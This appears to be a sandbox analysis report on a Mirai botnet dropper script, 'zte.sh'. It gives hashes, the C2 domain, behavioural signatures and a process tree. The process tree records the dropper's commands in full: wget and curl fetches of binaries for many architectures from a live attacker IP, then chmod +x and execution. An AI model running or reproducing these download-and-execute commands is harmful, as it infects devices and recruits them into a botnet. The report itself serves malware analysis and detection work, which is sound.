Analysis
-
max time kernel
136s -
max time network
138s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240729-en -
resource tags
-
submitted
17-12-2024 15:23
General
-
Target
zte.sh
-
Size
2KB
-
MD5
c2d1389e84451b69803d505ce0293f61
-
SHA1
6625185014b47c560c6059209c06de1e299fcb16
-
SHA256
0e6380d32502ec32658a9bd06ee6162eb5f519fefc44ab78047f624eed3b6689
-
SHA512
349a95586f606270c528700f2cd615a667cb48b498fa53221f05e3c46bcf8616942b617591548b6091c24d7fb949f1904c536f6d7f14071cfa9ec3897522adc5
Malware Config
Extracted
mirai
UNSTABLE
servers.vlrt-gap.com
Extracted
mirai
UNSTABLE
Extracted
mirai
UNSTABLE
servers.vlrt-gap.com
Signatures
-
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 13 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Deletes itself 1 IoCs
-
Executes dropped EXE 13 IoCs
-
Modifies Watchdog functionality 1 TTPs 2 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Writes file to system bin folder 2 IoCs
-
Changes its process name 1 IoCs
-
Reads runtime system information 13 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 25 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/zte.sh/tmp/zte.sh1⤵
- Writes file to tmp directory
-
/usr/bin/wgetwget http://185.196.11.47/zmap.x862⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.x862⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.x862⤵
-
-
/bin/chmodchmod +x systemd-private-7ea5d0f44b2046fa8f25575bd31e69e8-systemd-timedated.service-YzUBHa WTH zmap.x86 zte.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.mips2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/catcat zmap.mips2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod +x systemd-private-7ea5d0f44b2046fa8f25575bd31e69e8-systemd-timedated.service-YzUBHa WTH zmap.mips zmap.x86 zte.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Deletes itself
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Changes its process name
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.mpsl2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.mpsl2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.mpsl2⤵
-
-
/bin/chmodchmod +x systemd-private-7ea5d0f44b2046fa8f25575bd31e69e8-systemd-timedated.service-YzUBHa WTH zmap.mips zmap.mpsl zmap.x86 zte.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.arm2⤵
-
-
/bin/chmodchmod +x systemd-private-7ea5d0f44b2046fa8f25575bd31e69e8-systemd-timedated.service-YzUBHa WTH zmap.arm zmap.mips zmap.mpsl zmap.x86 zte.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm52⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm52⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.arm52⤵
-
-
/bin/chmodchmod +x systemd-private-7ea5d0f44b2046fa8f25575bd31e69e8-systemd-timedated.service-YzUBHa WTH zmap.arm zmap.arm5 zmap.mips zmap.mpsl zmap.x86 zte.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm62⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm62⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.arm62⤵
-
-
/bin/chmodchmod +x systemd-private-7ea5d0f44b2046fa8f25575bd31e69e8-systemd-timedated.service-YzUBHa WTH zmap.arm zmap.arm5 zmap.arm6 zmap.mips zmap.mpsl zmap.x86 zte.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arm72⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arm72⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.arm72⤵
-
-
/bin/chmodchmod +x systemd-private-7ea5d0f44b2046fa8f25575bd31e69e8-systemd-timedated.service-YzUBHa WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.x86 zte.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.ppc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.ppc2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.ppc2⤵
-
-
/bin/chmodchmod +x systemd-private-7ea5d0f44b2046fa8f25575bd31e69e8-systemd-timedated.service-YzUBHa WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.mips zmap.mpsl zmap.ppc zmap.x86 zte.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.m68k2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.m68k2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.m68k2⤵
-
-
/bin/chmodchmod +x systemd-private-7ea5d0f44b2046fa8f25575bd31e69e8-systemd-timedated.service-YzUBHa WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.x86 zte.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.spc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.spc2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.spc2⤵
-
-
/bin/chmodchmod +x WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.spc zmap.x86 zte.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.i6862⤵
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.i6862⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.i6862⤵
-
-
/bin/chmodchmod +x WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.spc zmap.x86 zte.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.sh42⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.sh42⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.sh42⤵
-
-
/bin/chmodchmod +x WTH zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.sh4 zmap.spc zmap.x86 zte.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
-
-
/usr/bin/wgetwget http://185.196.11.47/zmap.arc2⤵
-
-
/usr/bin/curlcurl -O http://185.196.11.47/zmap.arc2⤵
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat zmap.arc2⤵
-
-
/bin/chmodchmod +x WTH zmap.arc zmap.arm zmap.arm5 zmap.arm6 zmap.arm7 zmap.i686 zmap.m68k zmap.mips zmap.mpsl zmap.ppc zmap.sh4 zmap.spc zmap.x86 zte.sh2⤵
- File and Directory Permissions Modification
-
-
/tmp/WTH./WTH zte.selfrep2⤵
- Executes dropped EXE
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
94KB
MD58ae4ac18a3b34fba963f59a42ff02fb7
SHA1e9f75cf21972b2c953163d64d3cb89bd6a93cc1b
SHA256c485a846f4b7c5d410762291758175ca0775ca919da52ef05047f3000045020a
SHA512af6a9fb41fc94fdb3c1448e2477190f403b14eca2502e93c1ab6a1c8cf0eaada47dedd81df94f15bc6efa8ae29d68f3a6368c67283514c88f3f8e28519bf6bb0
-
Filesize
94KB
MD5d81e9564b8b9d62d70bda936d927d875
SHA142706a08b0545984ed5a5cfbdff3fe2ab62ca552
SHA256c14fead55aee69ec760fdba5f5371922595ad9df3c7201feb088f322043def0d
SHA512282a8641c62e67b1bde30e1bfbd991493c38155b6dfdb5406a80d69b7b710bfe27fdbe5571363c3f55e2fbb0a447db3789c5609493e24daef3260c2d87417886
-
Filesize
74KB
MD59784e8db8dae548a6593644e3a168579
SHA1afa7c4ce4b0122ec5f22dc37aa7658f41cb01008
SHA2564278fcf8ef5692822cc5eccce4857b5132f8d029949b83925a7a1e6f5c969129
SHA5127f48ae6e910f87f70995c6373083c534670e2f66310e51e8a0b43bc01a31327e33a992b3ad50bc4956e4c9fb3c0845e6ca6aca2dbb014e66487a8338efe2eb6c
-
Filesize
49KB
MD5241482e2337afd65af97770b37d5c90d
SHA1c52137309238b4f1badf1e7bf01197bc48cd00fc
SHA25601d39c861837c2f70e59a1e0af94249269813cfa8dc2696d095d36db84fcf7ca
SHA512cf3fbd84e7664d26a5cdbec8fb195d28438aca00c62b3428fd6d4c4ab7cb781d5816afa6eb046def918efc73059192683ba313c06fec2231cc6cff8610d29a00
-
Filesize
152KB
MD5f51e09e21e26b88091e5817482391af9
SHA135ac89537e69e933a9412877638edd2ddaf48195
SHA256ff15bf021c5804b34110ecab8a8c86dd399c60b246cb626f536a000b26b27e96
SHA51213a46b95db2323015267dd034bde6b2517ea447d091ba7b702aa249ea7172d876156554387b9a5640490b97217f48f843b28f00f65fdc45948a93fbbdb5dd1c3
-
Filesize
61KB
MD5d1f752879420a6d45d76f130281392d6
SHA146a92c0efae33b8a826dc48daa3dbf3d30be4a15
SHA2564fc42ee2d91d577e0bcc49c27d5f3936584ad49c27b5032baa57a6c6e53b4914
SHA51291e7beb1157bf75f4e73459eb2ab003005aa591848698451ee6dc79764570bf2d8a253c25dda6346b657367844048cd21be38b6485d169e373e8455b2d586225